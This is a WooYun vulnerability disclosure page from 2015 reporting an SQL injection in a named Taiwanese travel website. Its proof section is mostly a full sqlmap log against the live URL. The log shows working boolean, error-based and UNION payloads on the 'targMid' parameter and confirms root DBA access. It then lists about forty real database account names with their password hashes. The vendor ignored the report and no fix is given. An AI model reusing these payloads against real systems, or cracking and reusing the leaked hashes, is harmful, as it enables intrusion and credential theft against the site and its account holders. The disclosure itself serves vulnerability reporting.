当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099562

漏洞标题:台灣某旅遊網站SQL Injection

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 路人甲

提交时间:2015-03-05 14:39

修复时间:2015-03-10 14:40

公开时间:2015-03-10 14:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

台灣某旅遊網站SQL Injection

详细说明:

QQ截图20150304223109.png


QQ截图20150304223118.png


QQ截图20150304223127.png


QQ截图20150304223140.png

漏洞证明:

[root@Hacker~]# Sqlmap sqlmap.py -u "http://uukt.com.tw/point.php?targMid=20" --dbs --passwords --current-user --current-db --is-dba
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable lo
[*] starting at 22:14:22
[22:14:23] [INFO] testing connection to the target URL
[22:14:24] [INFO] testing if the target URL is stable. This can take a couple of seconds
[22:14:26] [INFO] target URL is stable
[22:14:26] [INFO] testing if GET parameter 'targMid' is dynamic
[22:14:27] [INFO] confirming that GET parameter 'targMid' is dynamic
[22:14:27] [INFO] GET parameter 'targMid' is dynamic
[22:14:28] [INFO] heuristic (basic) test shows that GET parameter 'targMid' might be injectable (possible DBMS: 'MySQL')
[22:14:28] [INFO] testing for SQL injection on GET parameter 'targMid'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n]
[22:14:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:14:31] [WARNING] reflective value(s) found and filtering out
[22:15:22] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[22:15:23] [INFO] GET parameter 'targMid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:15:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:15:24] [INFO] GET parameter 'targMid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[22:15:24] [INFO] testing 'MySQL inline queries'
[22:15:25] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:15:25] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[22:15:28] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:15:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:15:29] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:15:34] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[22:15:40] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[22:15:47] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[22:15:54] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[22:16:38] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[22:16:38] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes
[22:17:10] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[22:17:17] [INFO] testing 'MySQL >= 5.0 time-based blind - Parameter replace'
[22:17:47] [INFO] testing 'MySQL < 5.0 time-based blind - Parameter replace (heavy queries)'
[22:17:54] [INFO] testing 'MySQL time-based blind - Parameter replace (bool*int)'
[22:18:24] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[22:18:54] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[22:19:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:19:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:19:25] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the
[22:19:31] [INFO] target URL appears to have 33 columns in query
[22:19:56] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:20:37] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[22:20:59] [INFO] GET parameter 'targMid' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'targMid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 69 HTTP(s) requests:
---
Place: GET
Parameter: targMid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: targMid=20 AND 7028=7028
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: targMid=20 AND (SELECT 3024 FROM(SELECT COUNT(*),CONCAT(0x7168727671,(SELECT (CASE WHEN (3024=3024) THEN 1 ELSE 0 END)),0x7174696471,FLOOR(RAND(0)*2)
Type: UNION query
Title: MySQL UNION query (NULL) - 33 columns
Payload: targMid=-8489 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7168727671,0x6e474972707454685059,0x7174696471),NULL,N
---
[22:25:29] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.11, Apache 2.2.13
back-end DBMS: MySQL 5.0
[22:25:29] [INFO] fetching current user
current user: 'root@202.168.194.223'
[22:25:29] [INFO] fetching current database
current database: 'uukt'
[22:25:30] [INFO] testing if current user is DBA
[22:25:30] [INFO] fetching current user
current user is DBA: True
[22:25:31] [INFO] fetching database users password hashes
[22:26:08] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[22:26:10] [INFO] the SQL query used returns 72 entries
[22:26:10] [INFO] retrieved: "root","*CF45DAD86043DE7A20B7A4F3B1513B004C557504"
[22:26:10] [INFO] retrieved: "root","*CF45DAD86043DE7A20B7A4F3B1513B004C557504"
[22:26:11] [INFO] retrieved: "root","*CF45DAD86043DE7A20B7A4F3B1513B004C557504"
[22:26:11] [INFO] retrieved: "",""
[22:26:11] [INFO] retrieved: "",""
[22:26:12] [INFO] retrieved: "william","*77E533883395E51C09A6578B195D4E439F5F...
[22:27:03] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[22:27:05] [INFO] retrieved: "william","*77E533883395E51C09A6578B195D4E439F5F...
[22:27:05] [INFO] retrieved: "cc","*4EF6C076D8763684F46CC53F1A755B1093E98CC0"
[22:27:26] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:27:28] [INFO] retrieved: "sundayinn","0ae930ff02704234"
[22:27:28] [INFO] retrieved: "betauukt_db","749f967d1c1ec039"
[22:27:31] [INFO] retrieved: "betauukt_forum","0334cd8b0fd76327"
[22:27:32] [INFO] retrieved: "green-house","34835e7c269cc023"
[22:27:32] [INFO] retrieved: "2i","*A53C7BC4EEE12B9E591340B1F4F3F0730A2315FF"
[22:27:32] [INFO] retrieved: "2i","*A53C7BC4EEE12B9E591340B1F4F3F0730A2315FF"
[22:27:33] [INFO] retrieved: "newuukt_phpbb","5991fca119686482"
[22:27:33] [INFO] retrieved: "amd","41c26bb813730bb2"
[22:27:34] [INFO] retrieved: "phpbb_test","*032197AE5731D4664921A6CCAC7CFCE6A...
[22:27:35] [INFO] retrieved: "phpbb_test","*032197AE5731D4664921A6CCAC7CFCE6A...
[22:27:35] [INFO] retrieved: "ut","*E4025C68CB23BED874F4EA741F0773254FFF3742"
[22:27:35] [INFO] retrieved: "car45168","17f3990879bcb24b"
[22:27:36] [INFO] retrieved: "car45168","17f3990879bcb24b"
[22:27:36] [INFO] retrieved: "rockanthem","*20A7D084F791B2E8ED8CFDA27617E4103...
[22:27:36] [INFO] retrieved: "rockanthem","*20A7D084F791B2E8ED8CFDA27617E4103...
[22:27:37] [INFO] retrieved: "betauukt_xml","22ab0edb47a4b968"
[22:27:37] [INFO] retrieved: "newuukt_beta","53c904cf0096d827"
[22:27:38] [INFO] retrieved: "newuukt_xml","7dc18b8a6eac24a3"
[22:27:59] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:28:00] [INFO] retrieved: "green-house","34835e7c269cc023"
[22:28:01] [INFO] retrieved: "sundayinn","04bf0232193d8016"
[22:28:02] [INFO] retrieved: "sundayinn","0ae930ff02704234"
[22:28:02] [INFO] retrieved: "airgazzella","*5A8DC57B717E45D1C0C9D617E3B9A4B3...
[22:28:03] [INFO] retrieved: "airgazzella","*5A8DC57B717E45D1C0C9D617E3B9A4B3...
[22:28:03] [INFO] retrieved: "newuukt_xml","7dc18b8a6eac24a3"
[22:28:04] [INFO] retrieved: "singbwo","69d32d9235f095b4"
[22:28:07] [INFO] retrieved: "singbwo","69d32d9235f095b4"
[22:28:08] [INFO] retrieved: "singbwo","69d32d9235f095b4"
[22:28:08] [INFO] retrieved: "2ko","01516c791cca21ce"
[22:28:08] [INFO] retrieved: "2ko","01516c791cca21ce"
[22:28:09] [INFO] retrieved: "ut","7e7ed08239248037"
[22:28:09] [INFO] retrieved: "jasminn","1fdeb4dc496617f2"
[22:28:09] [INFO] retrieved: "jasminn","1fdeb4dc496617f2"
[22:28:10] [INFO] retrieved: "furguys","4699130827319a46"
[22:28:10] [INFO] retrieved: "csweaving","02d7d0081055a247"
[22:28:10] [INFO] retrieved: "csweaving","02d7d0081055a247"
[22:28:11] [INFO] retrieved: "seainn","5014bb351e63cf79"
[22:28:11] [INFO] retrieved: "seainn","5014bb351e63cf79"
[22:28:11] [INFO] retrieved: "cmchtw","723fef563da26e3d"
[22:28:12] [INFO] retrieved: "cmchtw","723fef563da26e3d"
[22:28:33] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:28:34] [INFO] retrieved: "showidea","2b5a8a590edb7579"
[22:28:35] [INFO] retrieved: "showidea","2b5a8a590edb7579"
[22:28:35] [INFO] retrieved: "amd","41c26bb813730bb2"
[22:28:35] [INFO] retrieved: "yc-design","00e72edc5684ffa6"
[22:28:36] [INFO] retrieved: "yc-design","00e72edc5684ffa6"
[22:28:37] [INFO] retrieved: "cmchtw","723fef563da26e3d"
[22:28:38] [INFO] retrieved: "yc-design","00e72edc5684ffa6"
[22:28:38] [INFO] retrieved: "rebacca","75a9036f4a0b5ec4"
[22:28:59] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:29:01] [INFO] retrieved: "rebacca","75a9036f4a0b5ec4"
[22:29:02] [INFO] retrieved: "smzwatch","599bdddb2a1a003c"
[22:29:02] [INFO] retrieved: "smzwatch","599bdddb2a1a003c"
[22:29:03] [INFO] retrieved: "v-cc259","1114f27d55bb8252"
[22:29:03] [INFO] retrieved: "grassinn","7f9e48843e428061"
[22:29:04] [INFO] retrieved: "smilehouse88","54a126f16cc2bbab"
[22:29:04] [INFO] retrieved: "furguys","4699130827319a46"
[22:29:13] [INFO] retrieved: "ouokt","57d716e16bfe1b59"
[22:29:14] [INFO] retrieved: "ichirin","0677217c21de3c92"
[22:29:15] [INFO] retrieved: "taichung-treasur","52d2046754daa0bc"
[22:29:15] [INFO] retrieved: "kt96","452c754c541fc72a"
[22:29:15] [INFO] retrieved: "starinn888","606f0f7922ecedee"
[22:29:36] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:29:39] [INFO] retrieved: "more-change","77f68855781cd2fa"
[22:29:40] [INFO] retrieved: "minyuan","08f657f457632e85"
[22:30:20] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[22:30:21] [INFO] retrieved: "shell23","624e6b6440e84d86"
[22:30:22] [INFO] retrieved: "ich","7d15bb8a39616c8b"
[22:30:23] [INFO] retrieved: "ich","7d15bb8a39616c8b"
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system users password hashes:
[*] 2i [1]:
password hash: *A53C7BC4EEE12B9E591340B1F4F3F0730A2315FF
[*] 2ko [1]:
password hash: 01516c791cca21ce
[*] airgazzella [1]:
password hash: *5A8DC57B717E45D1C0C9D617E3B9A4B3647524C4
[*] amd [1]:
password hash: 41c26bb813730bb2
[*] betauukt_db [1]:
password hash: 749f967d1c1ec039
[*] betauukt_forum [1]:
password hash: 0334cd8b0fd76327
[*] betauukt_xml [1]:
password hash: 22ab0edb47a4b968
[*] car45168 [1]:
password hash: 17f3990879bcb24b
[*] cc [1]:
password hash: *4EF6C076D8763684F46CC53F1A755B1093E98CC0
[*] cmchtw [1]:
password hash: 723fef563da26e3d
[*] csweaving [1]:
password hash: 02d7d0081055a247
[*] furguys [1]:
password hash: 4699130827319a46
[*] grassinn [1]:
password hash: 7f9e48843e428061
[*] green-house [1]:
password hash: 34835e7c269cc023
[*] ich [1]:
password hash: 7d15bb8a39616c8b
[*] ichirin [1]:
password hash: 0677217c21de3c92
[*] jasminn [1]:
password hash: 1fdeb4dc496617f2
[*] kt96 [1]:
password hash: 452c754c541fc72a
[*] minyuan [1]:
password hash: 08f657f457632e85
[*] more-change [1]:
password hash: 77f68855781cd2fa
[*] newuukt_beta [1]:
password hash: 53c904cf0096d827
[*] newuukt_phpbb [1]:
password hash: 5991fca119686482
[*] newuukt_xml [1]:
password hash: 7dc18b8a6eac24a3
[*] ouokt [1]:
password hash: 57d716e16bfe1b59
[*] phpbb_test [1]:
password hash: *032197AE5731D4664921A6CCAC7CFCE6A0698693
[*] rebacca [1]:
password hash: 75a9036f4a0b5ec4
[*] rockanthem [1]:
password hash: *20A7D084F791B2E8ED8CFDA27617E410349BEC3E
[*] root [1]:
password hash: *CF45DAD86043DE7A20B7A4F3B1513B004C557504
[*] seainn [1]:
password hash: 5014bb351e63cf79
[*] shell23 [1]:
password hash: 624e6b6440e84d86
[*] showidea [1]:
password hash: 2b5a8a590edb7579
[*] singbwo [1]:
password hash: 69d32d9235f095b4
[*] smilehouse88 [1]:
password hash: 54a126f16cc2bbab
[*] smzwatch [1]:
password hash: 599bdddb2a1a003c
[*] starinn888 [1]:
password hash: 606f0f7922ecedee
[*] sundayinn [2]:
password hash: 04bf0232193d8016
password hash: 0ae930ff02704234
[*] taichung-treasur [1]:
password hash: 52d2046754daa0bc
[*] ut [2]:
password hash: *E4025C68CB23BED874F4EA741F0773254FFF3742
password hash: 7e7ed08239248037
[*] v-cc259 [1]:
password hash: 1114f27d55bb8252
[*] william [1]:
password hash: *77E533883395E51C09A6578B195D4E439F5F5F19
[*] yc-design [1]:
password hash: 00e72edc5684ffa6
[22:30:43] [INFO] fetching database names
[22:30:43] [INFO] the SQL query used returns 45 entries
[22:30:43] [INFO] retrieved: "information_schema"
[22:31:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request

修复方案:

null

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-10 14:40

厂商回复:

最新状态:

暂无